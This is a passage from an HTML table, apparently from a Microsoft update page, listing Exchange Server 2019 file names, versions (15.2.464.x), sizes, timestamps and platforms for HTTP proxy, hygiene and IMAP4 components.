r><tr><td>Microsoft.exchange.frontendhttpproxy.dll</td><td>15.2.464.11</td><td>594,512</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.frontendhttpproxy.eventlogs.dll</td><td>15.2.464.10</td><td>14,720</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.frontendtransport.monitoring.dll</td><td>15.2.464.11</td><td>30,080</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.griffin.variantconfiguration.dll</td><td>15.2.464.10</td><td>99,
712</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.hathirdpartyreplication.dll</td><td>15.2.464.10</td><td>42,360</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.helpprovider.dll</td><td>15.2.464.10</td><td>40,312</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.addressfinder.dll</td><td>15.2.464.10</td><td>54,344</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.common.dll</td><td>15.2.464.10</td><td>164,224</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.diagnostics.dll</td><td>15.2.464.10</td><td>58,960</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.flighting.dll</td><td>15.2.464.10</td><td>204,368</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.passivemonitor.dll</td><td>15.2.464.10</td><td>18,000</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.proxyassistant.dll</td><td>15.2.464.10</td><td>30,592</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.routerefresher.dll</td><td>15.2.464.10</td><td>38,784</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.routeselector.dll</td><td>15.2.464.10</td><td>48,512</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.routing.dll</td><td>15.2.464.10</td><td>180,608</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpredirectmodules.dll</td><td>15.2.464.11</td><td>36,936</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.httputilities.dll</td><td>15.2.464.10</td><td>25,984</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.hygiene.data.dll</td><td>15.2.464.10</td><td>1,868,152</td><td>01-J
an-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.hygiene.diagnosisutil.dll</td><td>15.2.464.10</td><td>54,864</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.hygiene.eopinstantprovisioning.dll</td><td>15.2.464.11</td><td>35,704</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.idserialization.dll</td><td>15.2.464.10</td><td>35,944</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4.eventlog.dll</td><td>15.2.464.10</td><td>18,512</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></tr><tr><td>Microsoft.exchange.imap4.eventlog.dll.fe</td><td>15.2.464.10</td><td>18,512</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.imap4.exe</td><td>15.2.464.10</td><td>263,032</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4.exe.fe</td><td>15.2.464.10</td><td>263,032</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.imap4service.exe</td><td>15.2.464.10</td><td>24,952</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4service.exe.fe</td><td>15.2.464.10</td><td>24,952</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.imapconfiguration.dl1</td><td>15.2.464.10</td><td>53,112</td><td>01-Jan-2020</td><td>10:47</td><td>Not 
applicable</td></tr><tr><td>Microsoft.exchange.relevance.peopleranker.dll</td><td>15.2.464.10</td><td>36,728</td><td>01-Jan-2020</td><td>10:51</td>